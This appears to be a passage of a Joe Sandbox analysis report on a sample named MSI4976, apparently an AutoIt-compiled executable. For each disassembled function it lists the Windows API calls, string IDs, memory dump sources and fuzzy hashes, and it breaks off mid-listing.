                                        Function 0035F898 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 168windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 0035F8AB
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0035F8BD
                                        • SetWindowTextW.USER32(?,?), ref: 0035F8D4
                                        • GetDlgItem.USER32(?,000003EA), ref: 0035F8E9
                                        • SetWindowTextW.USER32(00000000,?), ref: 0035F8EF
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035F8FF
                                        • SetWindowTextW.USER32(00000000,?), ref: 0035F905
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0035F926
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0035F940
                                        • GetWindowRect.USER32(?,?), ref: 0035F949
                                        • SetWindowTextW.USER32(?,?), ref: 0035F9B4
                                        • GetDesktopWindow.USER32 ref: 0035F9BA
                                        • GetWindowRect.USER32(00000000), ref: 0035F9C1
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0035FA0D
                                        • GetClientRect.USER32(?,?), ref: 0035FA1A
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0035FA3F
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0035FA6A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID: @U=u
                                        • API String ID: 3869813825-2594219639
                                        • Opcode ID: e2ef1639f47b4330fde27e1d6e294c377f44b4463673cd4c9721c49f589d248f
                                        • Instruction ID: 7ce1062c8c019e15a042087593fdcc3025a71fe0d5956713e44c4940e799f00e
                                        • Opcode Fuzzy Hash: e2ef1639f47b4330fde27e1d6e294c377f44b4463673cd4c9721c49f589d248f
                                        • Instruction Fuzzy Hash: B9515F70900709AFDB229FA8CD85FAEBBF9FF04705F014928E596A65B0C774A948CF10
                                        Function 003869C5 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 281windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00386A52
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00386B12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-1753161424
                                        • Opcode ID: 2eafddf313cb417227ada1acba8fc703d7fc716644217507f6509b3865e57ef4
                                        • Instruction ID: b0888c839375614208b5a18b81210c036a625c5121af5d22641b038d1d00ce2d
                                        • Opcode Fuzzy Hash: 2eafddf313cb417227ada1acba8fc703d7fc716644217507f6509b3865e57ef4
                                        • Instruction Fuzzy Hash: 69A160346143019FCB0AFF24C992A6AB3A5FF45354F1488A9F8969F392DB30ED09CB41
                                        Function 0038E541 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 129filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0038E564
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0038E57B
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0038E586
                                        • CloseHandle.KERNEL32(00000000), ref: 0038E593
                                        • GlobalLock.KERNEL32(00000000), ref: 0038E59C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0038E5AB
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0038E5B4
                                        • CloseHandle.KERNEL32(00000000), ref: 0038E5BB
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0038E5CC
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003AD9BC,?), ref: 0038E5E5
                                        • GlobalFree.KERNEL32(00000000), ref: 0038E5F5
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0038E619
                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0038E644
                                        • DeleteObject.GDI32(00000000), ref: 0038E66C
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0038E682
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID: @U=u
                                        • API String ID: 3840717409-2594219639
                                        • Opcode ID: 6976d1d67ec082a9160d624efa052a13c46e83954bb612c3294e585c7940af42
                                        • Instruction ID: faa929f28ac9348dfeb1185f202b3f77bddea55fcb6039197f027608ccbad893
                                        • Opcode Fuzzy Hash: 6976d1d67ec082a9160d624efa052a13c46e83954bb612c3294e585c7940af42
                                        • Instruction Fuzzy Hash: F0413875600204BFDB12AF65DC88EABBBBDEF8A715F108598F906D7660D731AD01DB20
                                        Function 0035E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0035E6E1
                                        • _wcscmp.LIBCMT ref: 0035E6F2
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0035E71A
                                        • CharUpperBuffW.USER32(?,00000000), ref: 0035E737
                                        • _wcscmp.LIBCMT ref: 0035E755
                                        • _wcsstr.LIBCMT ref: 0035E766
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0035E79E
                                        • _wcscmp.LIBCMT ref: 0035E7AE
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0035E7D5
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0035E81E
                                        • _wcscmp.LIBCMT ref: 0035E82E
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0035E856
                                        • GetWindowRect.USER32(00000004,?), ref: 0035E8BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 2f56a07fe0c8418d0909d159dbffc5c9dfb871c71d3a0ed3753a3fbbaee2662a
                                        • Instruction ID: b3457e53d3cd069eda8f4a25dd46bcdb79f897a8692d27aec39081fa9011b227
                                        • Opcode Fuzzy Hash: 2f56a07fe0c8418d0909d159dbffc5c9dfb871c71d3a0ed3753a3fbbaee2662a
                                        • Instruction Fuzzy Hash: D481B4710083059FDB0ACF10C885FAA7BE8FF44755F04846AFD8A9A0A5DB34DE49CBA1
                                        Function 0038CC68 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 0038CD0B
                                        • DestroyWindow.USER32(00000000,?), ref: 0038CD83
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0038CE04
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0038CE26
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0038CE35
                                        • DestroyWindow.USER32(?), ref: 0038CE52
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00320000,00000000), ref: 0038CE85
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0038CEA4
                                        • GetDesktopWindow.USER32 ref: 0038CEB9
                                        • GetWindowRect.USER32(00000000), ref: 0038CEC0
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0038CED2
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0038CEEA
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$@U=u$tooltips_class32
                                        • API String ID: 1297703922-1130792468
                                        • Opcode ID: 47c17955a426685848da62e67b0292f1c5905659ee21a7e1182b4091b28be4ae
                                        • Instruction ID: de30b24f687e33dc07d1b1c8c0b09ceea69c3437dfac8c50240b408eca2a8d4a
                                        • Opcode Fuzzy Hash: 47c17955a426685848da62e67b0292f1c5905659ee21a7e1182b4091b28be4ae
                                        • Instruction Fuzzy Hash: 1A710071160349AFD726DF28CC85FAA3BE9FB89744F44059CF9859B2A1DB70E801CB21
                                        Function 0035E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: 9a99b14ed0c6060d53b8eab6093762c26d7ff56cabbe5adc0de33e34df6bbe91
                                        • Instruction ID: 70ac02d4645f2d516e2fdb8bf448817c12351f751826f0882e366f428bae84ad
                                        • Opcode Fuzzy Hash: 9a99b14ed0c6060d53b8eab6093762c26d7ff56cabbe5adc0de33e34df6bbe91
                                        • Instruction Fuzzy Hash: 3C31E432944215A6DB2BFB50ED13EEF73A4AF21B45F200426F9517A1E5FF61AF08C611
                                        Function 00386F67 Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 244windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00386FF9
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00387044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-383632319
                                        • Opcode ID: 242b07d5863e4aa27d77f077a9f1a122efca7bcf39b3820d31a24c0cf816a47b
                                        • Instruction ID: 5d4cb70aec7a350b5f221fd45bb8c1f2a26c13372d1df50a76e50ac2313522b7
                                        • Opcode Fuzzy Hash: 242b07d5863e4aa27d77f077a9f1a122efca7bcf39b3820d31a24c0cf816a47b
                                        • Instruction Fuzzy Hash: B491B6746087019FCB16FF14C891A6AB7A2AF94350F14489DF8965F7A3DB31ED0ACB41
                                        Function 003701E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcscpy.LIBCMT ref: 0037026A
                                        • _wcschr.LIBCMT ref: 00370278
                                        • _wcscpy.LIBCMT ref: 0037028F
                                        • _wcscat.LIBCMT ref: 0037029E
                                        • _wcscat.LIBCMT ref: 003702BC
                                        • _wcscpy.LIBCMT ref: 003702DD
                                        • __wsplitpath.LIBCMT ref: 003703BA
                                        • _wcscpy.LIBCMT ref: 003703DF
                                        • _wcscpy.LIBCMT ref: 003703F1
                                        • _wcscpy.LIBCMT ref: 00370406
                                        • _wcscat.LIBCMT ref: 0037041B
                                        • _wcscat.LIBCMT ref: 0037042D
                                        • _wcscat.LIBCMT ref: 00370442
                                          • Part of subcall function 0036C890: _wcscmp.LIBCMT ref: 0036C92A
                                          • Part of subcall function 0036C890: __wsplitpath.LIBCMT ref: 0036C96F
                                          • Part of subcall function 0036C890: _wcscpy.LIBCMT ref: 0036C982
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C995
                                          • Part of subcall function 0036C890: __wsplitpath.LIBCMT ref: 0036C9BA
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C9D0
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C9E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 2955681530-2806939583
                                        • Opcode ID: 31c8101800617a574736322b6fce96056730a70a86d8ee842835f9cd00645379
                                        • Instruction ID: 9ed05e0b5d2095eb56455715f68738147aee78c012606c2078f51f281e0cb895
                                        • Opcode Fuzzy Hash: 31c8101800617a574736322b6fce96056730a70a86d8ee842835f9cd00645379
                                        • Instruction Fuzzy Hash: 9991C172504701AFDB26EB50D991F9BB3E8AF84310F04885DF5499F292EB34FA44CB92
                                        Function 0038E305 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 199windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0038E3BB
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00389615,?), ref: 0038E417
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E457
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E49C
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0038E4D3
                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00389615,?), ref: 0038E4DF
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0038E4EF
                                        • DestroyCursor.USER32(?), ref: 0038E4FE
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0038E51B
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0038E527
                                          • Part of subcall function 00341BC7: __wcsicmp_l.LIBCMT ref: 00341C50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                        • String ID: .dll$.exe$.icl$@U=u
                                        • API String ID: 3907162815-1639919054
                                        • Opcode ID: d7272cef8b64680c1df5c63c10c977b5ed66ab0bbd713b6b2cf9ceb35509e393
                                        • Instruction ID: 518e0268d8ac9e92307201afae74faedbbb66079743b5fa1adf99f71029396a5
                                        • Opcode Fuzzy Hash: d7272cef8b64680c1df5c63c10c977b5ed66ab0bbd713b6b2cf9ceb35509e393
                                        • Instruction Fuzzy Hash: 4361DD71600715BBEB16EF64CC46FBA77ACAB09710F104145F915EB0D0EBB4E980C7A0
                                        Function 0036B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 0036B46D
                                        • VariantCopy.OLEAUT32(?,?), ref: 0036B476
                                        • VariantClear.OLEAUT32(?), ref: 0036B482
                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0036B561
                                        • __swprintf.LIBCMT ref: 0036B591
                                        • VarR8FromDec.OLEAUT32(?,?), ref: 0036B5BD
                                        • VariantInit.OLEAUT32(?), ref: 0036B63F
                                        • SysFreeString.OLEAUT32(00000016), ref: 0036B6D1
                                        • VariantClear.OLEAUT32(?), ref: 0036B727
                                        • VariantClear.OLEAUT32(?), ref: 0036B736
                                        • VariantInit.OLEAUT32(00000000), ref: 0036B772
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                        • API String ID: 3730832054-3931177956
                                        • Opcode ID: cd31edee6883e777cf485ba765546560125384146c7459173bd1f2f5df98708b
                                        • Instruction ID: f50894b73c71b600d96d1a0fbc90e2f669cff85f029e6bc52ad0c013adf83b7f
                                        • Opcode Fuzzy Hash: cd31edee6883e777cf485ba765546560125384146c7459173bd1f2f5df98708b
                                        • Instruction Fuzzy Hash: 79C1AF71A04615DBCB23AF66D484B69F7B8BF06300F15C465E409DB98ADB74EC80DFA1
                                        Function 00370E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 00370EFF
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00370F0F
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00370F1B
                                        • __wsplitpath.LIBCMT ref: 00370F79
                                        • _wcscat.LIBCMT ref: 00370F91
                                        • _wcscat.LIBCMT ref: 00370FA3
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00370FB8
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370FCC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00370FFE
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0037101F
                                        • _wcscpy.LIBCMT ref: 0037102B
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037106A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                        • String ID: *.*
                                        • API String ID: 3566783562-438819550
                                        • Opcode ID: 3b7fe1d7183da5ac3ddfaeb5154992d1a31304fdfd75abbcd9f6f82aaf770c15
                                        • Instruction ID: ee6f832a0bcaa3383736ab7f30b0e848486b9983db9ca9b9bf082ca67b6ea14a
                                        • Opcode Fuzzy Hash: 3b7fe1d7183da5ac3ddfaeb5154992d1a31304fdfd75abbcd9f6f82aaf770c15
                                        • Instruction Fuzzy Hash: 7A616DB25047059FD721EF24C844A9FB3E8FF89310F04891EF9899B251EB35EA45CB92
                                        Function 0036DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • CharLowerBuffW.USER32(?,?), ref: 0036DB26
                                        • GetDriveTypeW.KERNEL32 ref: 0036DB73
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DBBB
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DBF2
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0036DC20
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
